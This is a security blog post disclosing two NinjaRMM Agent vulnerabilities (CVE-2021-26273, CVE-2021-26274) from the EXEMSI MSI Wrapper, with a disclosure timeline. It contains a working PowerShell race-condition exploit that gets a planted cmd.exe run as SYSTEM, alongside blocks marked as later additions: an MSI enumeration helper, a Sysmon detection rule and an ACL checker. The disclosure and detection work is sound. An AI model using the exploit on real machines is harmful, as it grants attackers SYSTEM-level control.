URL: https://improsec.com/tech-blog/privilege-escalation-vulnerability-in-ninjarmm
PRIVILEGE ESCALATION VULNERABILITY IN NINJARMM AGENT MSI INSTALLER INTRODUCED BY
EXEMSI MSI WRAPPER

Martin Sohn Christensen
May 11, 2021
During a customer engagement I identified a local privilege escalation
vulnerability (CVE-2021-26273) in a remote monitoring and management (RMM) tool:
NinjaRMM Agent. The vulnerability allowed a non-administrative user to become
"NT Authority\SYSTEM".

Since the RMM tool was deployed on most of the customer's systems, the newfound
vulnerability, in combination with lateral movement, made it easy to compromise
any of the customer's most critical systems.

After the discovery, I went into talks with NinjaRMM, who traced the
vulnerability to a tool used to build their installer: EXEMSI MSI Wrapper, which
allows a software vendor to "wrap" an EXE-file in an MSI-file for easier
deployment. The MSI Wrapper itself and systems with it installed are not
vulnerable, but any MSI-files created with the tool could be (CVE is pending).

I have spent additional time identifying and contacting other software vendors
using MSI Wrapper, to make them aware of the issue and ensure it is mitigated in
their newest deployments.

I also discovered an additional vulnerability (CVE-2021-26274) in the NinjaRMM
Agent, not nearly as interesting, but a vulnerability nonetheless.

Both NinjaRMM Agent vulnerabilities are described in this blog post. The exact
steps to exploit the local privilege escalation vulnerability will vary depending
on how the software vendor customizes the MSI-file and how the MSI-file is
deployed.


CVES REGISTERED

 * NinjaRMM Agent
   * CVE: CVE-2021-26273
   * CVE: CVE-2021-26274
   * Update regarding the CVEs from Ninja


AFFECTED VERSIONS

 * EXEMSI MSI Wrapper prior to version 10.0.50 and at least since version 6.0.91

 * NinjaRMM Agents prior to version 5.0.4.0, since version 4.0.0


TIMELINE

 * NinjaRMM
   * 2021/01/13: Vulnerability discovered during customer engagement.
   * 2021/01/18: Contacted NinjaRMM via phone call; was told they would return
     via e-mail.
   * 2021/01/22: Received no response. Contacted NinjaRMM CSO via LinkedIn.
   * 2021/01/23: Discovered second vulnerability.
   * 2021/01/25: Contacted by NinjaRMM CSO.
   * 2021/01/27: Vulnerability confirmed and mitigation in progress.
   * 2021/01/28: NinjaRMM patched all deployed NinjaRMM Agents.

 * EXEMSI MSI Wrapper
   * 2021/01/27: Potential vulnerability discovered based on information from
     NinjaRMM.
   * 2021/01/27: Contacted EXEMSI via phone call.
   * 2021/02/03: Confirmed mitigation in updated version provided by vendor.


CVE-2021-26273 – WINDOWS INSTALLER LOCAL PRIVILEGE ESCALATION


DESCRIPTION

The NinjaRMM Agent version 5.0.909 Windows Installer executes an EXE-file as "NT
Authority\SYSTEM" from the directory "%TEMP%\MW-<GUID>\" with the name
"<GUID>-<ORGANIZATION SPECIFIC STRING>-<version>-windows-installer.exe".

The default permissions of both the directory and the executable file grant
non-administrative users write access.

Due to the weak permissions, an attacker can place their own executable at that
path before the Windows Installer does, lock the file against writes, and wait
for the installer to execute it as "NT Authority\SYSTEM".

This class of vulnerability, how to exploit it and how to mitigate it, is also
described in the following resources:

 * A responsible disclosure webinar held by my colleague Anders Kusk and Lasse
   Trolle Borup, which describes the strange behaviour of the Windows Installer
   API.

 * A blog post by my colleague Anders Kusk: The many pitfalls of Windows MSI -
   Privilege escalation in Windows 7/8.1/10/Server and a range of third-party
   products.

 * SandboxEscaper's Chasing polar bears: part one and part two.





WALKTHROUGH

The Author property of the files in C:\Windows\Installer reveals that NinjaRMM
software has a cached Windows Installer file:



The identified file is NinjaRMM Agent:
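Doing the same lookup at scale, as an added example that is not part of the original post: the function below reads the summary information stream (Title, Subject, Author) of every cached package in C:\Windows\Installer through the WindowsInstaller.Installer COM object, which is what Explorer's Author column displays. The directory path and the "Ninja" filter in the usage line are assumptions for the example; no elevation is needed, since standard users can read the cached packages.

```powershell
# Added example, not from the original post. Reads the summary information
# stream of each cached package via the WindowsInstaller.Installer COM object.
function Get-CachedMsiSummary {
    param([string]$InstallerDir = (Join-Path $env:SystemRoot 'Installer'))

    $installer = New-Object -ComObject WindowsInstaller.Installer
    # Summary-information property ids: 2 = Title, 3 = Subject (product), 4 = Author (vendor)
    $propertyIds = @{ Title = 2; Subject = 3; Author = 4 }

    foreach ($file in Get-ChildItem -LiteralPath $InstallerDir -Filter '*.msi' -File -ErrorAction SilentlyContinue) {
        try {
            # SummaryInformation(path, updateCount = 0) opens the stream read-only;
            # late-bound COM calls need InvokeMember from PowerShell.
            $summary = $installer.GetType().InvokeMember('SummaryInformation', 'InvokeMethod', $null, $installer, @($file.FullName, 0))
            $record = [ordered]@{ Path = $file.FullName }
            foreach ($name in 'Title', 'Subject', 'Author') {
                $record[$name] = $summary.GetType().InvokeMember('Property', 'GetProperty', $null, $summary, @($propertyIds[$name]))
            }
            [pscustomobject]$record
        } catch {
            Write-Warning "Could not read $($file.FullName): $_"
        }
    }
}

# Usage: find the cached package behind a vendor name (the filter string is an assumption).
Get-CachedMsiSummary | Where-Object { $_.Author -match 'Ninja' -or $_.Subject -match 'Ninja' } | Format-Table -AutoSize
```

The Path column gives the randomly named cached file to pass to msiexec.exe in the next step.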



The cached Windows Installer file can be run in repair mode ("/fa", reinstall
all files) with msiexec.exe by a non-administrative user:

msiexec.exe /fa C:\Windows\Installer\<name>.msi

During execution, Sysinternals Process Monitor was used to monitor the file
operations of the installer. It showed that an .exe is created in the context of
the executing non-administrative user (seen from the Integrity: Medium property):



And later the same file is executed by SYSTEM without impersonation (SYSTEM also
performs other operations on the file, but none that affect the exploit
demonstrated here):



A tip is: “If you do file operations on Windows on unprotected directories, you
must do it with an impersonated token [instead of the primary token] or else you
risk a file manipulation attack”[1]

Inspecting permissions of the directory and executable reveals that it is indeed
unprotected (our non-administrative user has Full control):



So how do we do this "file manipulation attack"? Since the non-administrative
user has write permission to the directory and file, we can exploit the race
condition by placing our own executable file (or a symbolic link) before the
installer does, locking the file for writing, and waiting for the installer to
execute it.

However, the name of the directory in which the file resides contains a GUID
that is unique to each execution, and we need to know it before placing our
file. The directory's name is:

"%TEMP%\MW-<RANDOM GUID>"

The file's name also contains a GUID, but it turned out to be static when tested
on multiple systems with the same installer. Executing the installer once and
inspecting the "%TEMP%\MW-<RANDOM GUID>\" directory gives you this name. The
file's name is:

"<STATIC GUID>-<ORGANIZATION SPECIFIC STRING>-<VERSION>-windows-installer.exe".

To develop the exploit, I used PowerShell. The code below performs the following
steps:

 1. Load an executable file into memory (I will use cmd.exe), ready to be
    placed into the directory as the executable file.

 2. Continuously check for the directory containing a random GUID.

 3. Create the executable file.
    1. If successful, lock the file for writing, to protect it from
       modification by the legitimate NinjaRMM Agent Windows Installer.

 4. Pause the script to wait for the Windows Installer to execute the
    executable.

Disclaimer: PowerShell is slow for race conditions, and the code can be
optimized in multiple ways to increase the chances of "winning".

# Read the payload (a copy of cmd.exe) into memory so it can be written in one call.
# File.ReadAllBytes works in both Windows PowerShell and PowerShell 7
# (Get-Content -Encoding Byte does not exist in PowerShell 7).
[byte[]] $exeBytes = [System.IO.File]::ReadAllBytes("C:\Windows\System32\cmd.exe")

# The file name contains a GUID that was static across systems for this installer;
# the organization specific string must be taken from a prior run of the installer.
$exe = "883f27ea-79a5-4c31-8fe9-7fe32cccc582-<ORGANIZATION SPECIFIC STRING>-4.5.6152-windows-installer.exe"

# The staging directory is created under the caller's %TEMP% with a random GUID suffix.
$dirPattern = Join-Path $env:TEMP "MW-*"
Write-Host "exe loaded, launch installer now."

while ($true) {
    # Poll as fast as possible; the directory only exists for the duration of the install.
    $dir = Get-Item -Path $dirPattern -ErrorAction SilentlyContinue | Select-Object -First 1
    if (-not $dir) { continue }

    $exePath = Join-Path $dir.FullName $exe
    try {
        # Drop the payload under the expected name before the installer writes its own file.
        [System.IO.File]::WriteAllBytes($exePath, $exeBytes)
        # Re-open with read access and share-read only: the installer can still read and
        # execute the file, but can no longer overwrite it with the legitimate executable.
        $fileStream = [System.IO.File]::Open($exePath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read)

        Read-Host "Press return when done/if you get shell (to release file lock)."

        $fileStream.Close()
    } catch {
        Read-Host "Lost race condition."
    }
    break
}

The exploit is demonstrated on our Improsec YouTube channel:



The exploit can also be followed by relating the numbers in the list below to
the numbers in the screenshot:

 1. The exploit code being executed.
 2. Executing the NinjaRMM Agent Windows Installer.
 3. The NinjaRMM Agent Windows Installer executing.
 4. The executable file (cmd.exe) opened by Windows Installer as "NT
    Authority\SYSTEM".



Inspecting a Process Monitor capture from a successful exploit we see:

 1. PowerShell querying for the randomly named directory.
 2. MsiExec creating the directory.
 3. PowerShell finding the directory.
 4. PowerShell successfully creating our file (copy of cmd.exe).
 5. MsiExec failing to create the installer file.
 6. Later on, Process Monitor shows MsiExec.exe executing the file.
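The Process Monitor sequence above is what a host-based detection should look for in production: an executable in a user's Temp directory started by msiexec.exe as SYSTEM. The code below is an added example and not part of the original post; it assumes Sysmon process-creation logging (Event ID 1) with its standard field names. The sample event is constructed for the example, and the user name, organization string and GUIDs in it are made up.

```powershell
# Added example, not from the original post. Assumes Sysmon with process-creation
# (Event ID 1) logging; the field names below are the Sysmon event data names.

function ConvertFrom-SysmonEventXml {
    # Flatten the <Data Name="..."> elements of one Sysmon event into an object.
    param([Parameter(Mandatory)][string]$EventXml)
    $xml = [xml]$EventXml
    $fields = @{}
    foreach ($d in $xml.Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
    [pscustomobject]$fields
}

function Test-SystemLaunchFromUserTemp {
    # True when msiexec.exe started a SYSTEM process from an executable located in a
    # per-user Temp directory, the pattern the vulnerable MSI Wrapper builds produce.
    param(
        [Parameter(Mandatory)]$Fields,
        # Assumed layout: <drive>:\Users\<user>\AppData\Local\Temp\MW-<guid>\<file>.exe
        # (-match is case-insensitive in PowerShell, so no (?i) is needed)
        [string]$PathPattern = '^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\MW-[0-9A-Fa-f-]+\\[^\\]+\.exe$'
    )
    return (
        ($Fields.ParentImage -match '\\msiexec\.exe$') -and
        ($Fields.Image -match $PathPattern) -and
        ($Fields.User -eq 'NT AUTHORITY\SYSTEM')
    )
}

# Constructed sample event (not a real capture); user, GUIDs and org string are made up.
$sampleEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>
  <EventData>
    <Data Name="UtcTime">2021-01-13 10:15:42.123</Data>
    <Data Name="Image">C:\Users\jdoe\AppData\Local\Temp\MW-5b0e1c7a-2d3f-4e8a-9c1b-7f6d5e4c3b2a\883f27ea-79a5-4c31-8fe9-7fe32cccc582-exampleorg-4.5.6152-windows-installer.exe</Data>
    <Data Name="User">NT AUTHORITY\SYSTEM</Data>
    <Data Name="IntegrityLevel">System</Data>
    <Data Name="ParentImage">C:\Windows\System32\msiexec.exe</Data>
    <Data Name="ParentCommandLine">C:\Windows\System32\msiexec.exe /V</Data>
  </EventData>
</Event>
'@

$fields = ConvertFrom-SysmonEventXml -EventXml $sampleEvent
Test-SystemLaunchFromUserTemp -Fields $fields   # True for the constructed sample

# Live hunt over the local Sysmon log (assumes the default channel name).
function Find-SystemLaunchFromUserTemp {
    param([datetime]$Since = (Get-Date).AddDays(-7))
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = $Since }
    foreach ($evt in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        $f = ConvertFrom-SysmonEventXml -EventXml $evt.ToXml()
        if (Test-SystemLaunchFromUserTemp -Fields $f) {
            [pscustomobject]@{
                Time        = $f.UtcTime
                Image       = $f.Image
                Hashes      = $f.Hashes
                ParentImage = $f.ParentImage
                User        = $f.User
            }
        }
    }
}

Find-SystemLaunchFromUserTemp | Format-Table -AutoSize
```

Note that every legitimate run of a package built with a vulnerable MSI Wrapper version produces the same event, so a hit means the pattern is present on the host, not necessarily that it was exploited; comparing the Hashes field against the hash of the vendor's genuine installer executable separates the two.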




CVE-2021-26274 – INSECURE DEFAULT PERMISSIONS ON NINJARMM AGENT PROGRAMDATA
DIRECTORY


DESCRIPTION

The directory "C:\ProgramData\NinjaRMMAgent", created during NinjaRMM Agent
installation, allows "BUILTIN\Users" to write to the folder and its subfolders:



Since the NinjaRMM Agent service, running as "NT Authority\SYSTEM", creates,
writes to, and deletes log files in this directory, it would be possible to
redirect those operations (e.g. with symbolic links) to arbitrary local paths.
This could result in loss of integrity of system-critical files stored in
C:\Windows, leading to denial of service.



No proof-of-concept was made for this vulnerability, but again I refer to
SandboxEscaper's blogs, and for tools to exploit it I recommend James Forshaw's
symboliclink-testing-tools.
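Both findings in this post reduce to the same question: does a low-privilege principal hold write-type rights on a location a SYSTEM process later trusts? The function below is an added example, not part of the original post, that answers it for the ProgramData directory of CVE-2021-26274 and for the MW-<GUID> staging directory of CVE-2021-26273. It reports Allow ACEs granting create, delete, change-permission or take-ownership rights (including the generic-rights form Get-Acl sometimes returns) to low-privilege principals, plus the case where such a principal owns the object and could rewrite its DACL. The principal list and the paths in the usage line are assumptions.

```powershell
# Added example, not from the original post. Reports ACEs that give low-privilege
# principals write-type rights on the given paths; the principal list is an assumption.
function Test-WeakWriteAcl {
    param(
        [Parameter(Mandatory)][string[]]$Path,
        [string[]]$LowPrivPrincipal = @(
            'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone',
            'NT AUTHORITY\INTERACTIVE', "$env:USERDOMAIN\$env:USERNAME"
        )
    )
    # Specific rights that let a caller create, replace, delete or re-point content,
    # or rewrite the DACL and thereby grant themselves anything else.
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
    # Get-Acl can return generic rights (negative enum values) instead of specific bits.
    $genericAll   = 0x10000000
    $genericWrite = 0x40000000

    foreach ($p in $Path) {
        try { $acl = Get-Acl -LiteralPath $p -ErrorAction Stop }
        catch { Write-Warning "Cannot read ACL of ${p}: $_"; continue }

        # The owner can always rewrite the DACL, regardless of the ACEs present.
        if ($LowPrivPrincipal -contains $acl.Owner) {
            [pscustomobject]@{ Path = $p; Principal = $acl.Owner; Rights = 'Owner (may rewrite DACL)'; Inherited = $false }
        }
        foreach ($ace in $acl.Access) {
            # Deny ACEs are not modelled; a matching Deny could still block a reported Allow.
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipal -notcontains $ace.IdentityReference.Value) { continue }
            $rights = [int]$ace.FileSystemRights
            if (($rights -band $writeMask) -or ($rights -band $genericAll) -or ($rights -band $genericWrite)) {
                [pscustomobject]@{
                    Path      = $p
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

# Paths from this post plus the caller's own %TEMP% as a known-weak control case;
# MW-* staging directories only exist while an install is running.
$targets = @('C:\ProgramData\NinjaRMMAgent', $env:TEMP) +
           @(Get-ChildItem -Path $env:TEMP -Directory -Filter 'MW-*' -ErrorAction SilentlyContinue | ForEach-Object FullName)
Test-WeakWriteAcl -Path ($targets | Where-Object { Test-Path -LiteralPath $_ }) | Format-Table -AutoSize
```

The %TEMP% entry is expected to be reported (it is the current user's own directory) and confirms the check works; any other hit on a path a SYSTEM service or installer writes to or executes from is the condition both CVEs depend on.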




[1]
https://www.cyberark.com/resources/threat-research-blog/follow-the-link-exploiting-symbolic-links-with-ease

Tagged: Vulnerability, Responsible Disclosure, Research
